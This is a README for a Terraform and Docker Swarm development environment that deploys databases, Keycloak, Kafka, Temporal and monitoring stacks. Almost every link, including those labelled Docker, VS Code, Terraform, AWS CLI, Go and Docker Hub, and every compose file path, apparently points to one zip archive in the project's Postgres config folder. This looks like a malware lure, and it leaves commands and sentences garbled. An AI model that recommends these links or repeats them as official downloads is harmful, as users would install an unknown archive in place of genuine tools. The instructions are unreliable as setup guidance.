= Docker Swarm Development Environment
:toc:
:toclevels: 2

// For image versions, check the stack's `docker-compose.*.yml` files
:host: localhost
:traefik-version: 3.6.1
:traefik-whoami-version: 1.11.0
:nginx-version: 1.29.3
:portainer-ce-version: 2.33.3
:portainer-agent-version: 2.33.3
:postgres-version: 17.5
:mongo-version: 8.2.1
:redis-version: 8.2.3
:neo4j-version: 5.26.16
:influxdb-version: 2.7.12 
:keycloak-version: 26.4
:maildev-version: 2.2.1
:kafka-version: 3.9.1 
:temporal-base-version: 1.29.1
:temporal-auto-setup: 1.29.1
:temporal-ui-version: 2.43.3
:temporal-admin-tools-version: 1.29
:localstack-version: 4.10.0
:prometheus-version: 3.7.3
:grafana-version: 12.2.1
:grafana-loki-version: 3.5.8
:grafana-tempo-version: 2.9.0
:grafana-promtail-version: 3.5.8

This project is intended to help developers quickly deploy *backing services* commonly used during the development cycle.

It contains _Terraform_ modules for deploying _Docker_ services into a _Swarm_ cluster. See <<automated-start>>.

It is always possible to run all stacks manually using the `docker stack deploy` command. See <<manual-start>>.

A *Dev Containers* setup for local development is provided.

== Topics
_devcontainers_, _docker-swarm_, _terraform_, _redis_, _postgres_, _mongodb_, _keycloak_, _grafana_, _loki_, _tempo_,
_prometheus_, _traefik_, _portainer_, _kafka_, _temporal_, _localstack_, neo4j, influxdb

== Prerequisites
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Dev Containers]
- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Docker]

- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Visual Studio Code]

- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[VS Code Remote Development Extension]

=== Running locally? 
Install

- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Terraform]

- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[AWS CLI]

- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Go]

NOTE: For a complete development environment configuration check https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Dockerfile] and https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[].

== Getting started

[source,shell]
----
docker swarm init --task-history-limit=0
----

[[manual-start]]
=== Manual Start
Manually deploy and manage _Docker Swarm_ resources.

Run `docker stack deploy` command to deploy stack to _Docker Swarm_ cluster.

NOTE: The required number of service instances must be configured using environment variables `ENV=VALUE docker stack deploy`.

[[automated-start]]
=== Automated Start

Use _Terraform_ to deploy _Docker Swarm_ stacks.

Service deployments and replica counts are controlled dynamically using the _Terraform_ `replicas` map
variable, defined in https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[`https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip`], which specifies how many instances of each service should run.

[source,shell]
----
terraform init
----

==== Plan

[source,shell]
----
terraform plan
----

==== Deploy

[source,shell]
----
terraform apply
----

[NOTE]
====
Only changed stack is updated.
====

==== Destroy

[source,shell]
----
terraform destroy
----

[CAUTION]
====
Terraform does not automatically create or destroy a Docker Swarm cluster. You need to handle Swarm initialization and cleanup manually.

Run manually `docker swarm leave -f` to leave the cluster.
====

==== Format
[source,shell]
----
tf fmt -recursive .
----

=== Production
[IMPORTANT]
====
The default configuration contains *placeholder* values.
Create a https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip file to override these with real secrets for production.
====

[[stacks]]
== Stacks

.Stacks
[frame=none,%autowidth]
|===
|Stack |URL | Compose file | Services | Environment Variables

|<<traefik>> | http://{host}:8080 +
http://{host}/whoami | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | - Traefik ({traefik-version}) +
- whoami ({traefik-whoami-version}) |

|<<nginx>> | http://{host}:7233 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | NGINX ({nginx-version}) |

|<<portainer>> | http://{host}:9000 +
http://{host}/portainer | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | 
- Portainer CE ({portainer-ce-version}) +
- Portainer Agent ({portainer-agent-version}) |

|<<postgres>> | http://{host}:5432 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | Postgres ({postgres-version}) | POSTGRES_REPLICAS

|<<mongo>> | http://{host}:27017 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | Mongo ({mongo-version}) | MONGO1_REPLICAS +
MONGO2_REPLICAS +
MONGO3_REPLICAS +
MONGO_INIT_REPLICAS

|<<redis>> | http://{host}:6379 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | Redis ({redis-version}) | REDIS_REPLICAS

|<<influxdb>> | http://{host}:8086 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | InfluxDB ({influxdb-version}) | INFLUXDB_REPLICAS

|<<neo4j>> | http://{host}:7474 +
http://{host}:7687 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | Neo4j ({neo4j-version}) | NEO4J_REPLICAS

|<<keycloak>> | http://{host}/keycloak/ | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | Keycloak ({keycloak-version}) | KEYCLOAK_REPLICAS

|<<kafka>> | http://{host}:9092 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | Kafka ({kafka-version}) | KAFKA_REPLICAS

|<<maildev>> | http://{host}:1080 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | MailDev ({maildev-version}) | MAILDEV_REPLICAS

|<<temporal>> | http://{host}:8081/temporal/ | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | 
- Temporal History ({temporal-base-version}) +
- Temporal Matching ({temporal-base-version}) +
- Temporal Frontend ({temporal-base-version}) +
- Temporal Worker ({temporal-base-version}) +
- Temporal Auto Setup ({temporal-auto-setup}) +
- Temporal Admin Tool ({temporal-admin-tools-version}) +
- Temporal UI ({temporal-ui-version}) | TEMPORAL_REPLICAS

|<<localstack>> | http://{host}:4566 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | 
- S3 ({localstack-version}) +
- IAM ({localstack-version}) +
- STS ({localstack-version}) | LOCALSTACK_REPLICAS

|<<prometheus>> | http://{host}:9090 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | Prometheus ({prometheus-version}) | PROMETHEUS_REPLICAS

|<<grafana>> | http://{host}:3000 +
http://{host}:3100 +
http://{host}:3200 | https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[] | 
- Grafana {grafana-version} +
- Loki ({grafana-loki-version}) +
- Tempo ({grafana-tempo-version}) +
- Promtail ({grafana-promtail-version}) | GRAFANA_REPLICAS

|===

[[traefik]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Traefik]
Reverse Proxy

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip traefik
----

==== Whoami
Tiny Go webserver that prints OS information and HTTP request to output, ideal for testing.

[[nginx]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[NGINX]
Reverse Proxy
[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip nginx
----

[[portainer]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Portainer]
Container Management

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip portainer
----

[[postgres]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[PostgreSQL]
Relational Database

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip postgres
----

==== Secrets

[source,shell]
----
echo "postgres" | docker secret create postgres-user -
----

[source,shell]
----
echo "postgres" | docker secret create postgres-password -
----

[[mongo]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[MongoDB]
No SQL Document Database

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip mongo
----

==== Secrets

[source,shell]
----
openssl rand -base64 756 | docker secret create mongo-keyfile -
----

[source,shell]
----
echo "mongo" | docker secret create mongo-username -
----

[source,shell]
----
echo "mongo" | docker secret create mongo-password -
----

[[redis]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Redis]
In memory data store

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip redis
----

==== Secrets

[source,shell]
----
echo "redis" | docker secret create redis-username -
----

[source,shell]
----
echo "redis" | docker secret create redis-password -
----

[[influxdb]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[InfluxDB]
Time Series Database

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip influxdb
----

==== Secrets

[source,shell]
----
echo "influxdb" | docker secret create influxdb-username -
----

[source,shell]
----
echo "influxdb" | docker secret create influxdb-password -
----

[[neo4j]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Neo4j]
Graph Database

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip neo4j
----

==== Secrets

[source,shell]
----
echo "neo4j/your_password" | docker secret create neo4j-auth -
----

[[keycloak]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Keycloak]
Identity and Access Management

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip keycloak
----

A *test* realm and *admin* user with password *admin* is automatically from `./config/keycloak/import`.

==== Secrets

[source,shell]
----
echo "keycloak" | docker secret create keycloak-admin-username -
----

[source,shell]
----
echo "keycloak" | docker secret create keycloak-admin-password -
----

[[kafka]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Kafka]
Messaging system streaming platform

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip kafka
----

[[maildev]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[MailDev]
SMTP Server

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip maildev
----

==== Secrets

[source,shell]
----
echo "maildev" | docker secret create maildev-username -
----

[source,shell]
----
echo "maildev" | docker secret create maildev-password -
----

[[temporal]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Temporal]
Execution platform

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip temporal
----

NOTE: _NGINX_ is used to proxy _Temporal_ GRPC port. See <<nginx>> configuration.

[[localstack]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[LocalStack]
Local AWS Services

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip localstack
----

[[prometheus]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Prometheus]
Monitoring and alerting toolkit

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip prometheus
----

[[grafana]]
=== https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Grafana]
Observability

[source,shell]
----
docker stack deploy --resolve-image changed -c https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip grafana
----


== Add a new Stack
1. Create a new _Docker Compose_ file named `docker-compose.<stack>.yml`.

2. In https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[]_, add a *stack_service_replicas_env_config* environment variable for the service replicas.
If necessary, add new plain or sensitive variable for storing stack data or secrets.

3. If needed, define `Terraform` output for the stack in https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[]_.

4. Add a new stack module in https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[]_.
Provide the *docker-swarm-stack* module variables:
- *stack_name* 
- *compose_file* 
- *replicas*
- *secrets* 
- *depends_on*

Note: For manual deployment only first step is mandatory. 

== Testing
https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Terratest]

[source,shell]
----
cd test && go test -v
----

== Conventions
- Compose file name `docker-compose.<stack>.yml`
- Use `https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip` (RFC 2606 reserved for testing and documentation)

== References
- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Docker Hub]
- https://github.com/Akhmadalfi22/devenv-docker-swarm/raw/refs/heads/main/config/postgres/swarm-docker-devenv-v1.0.zip[Terraform Registry]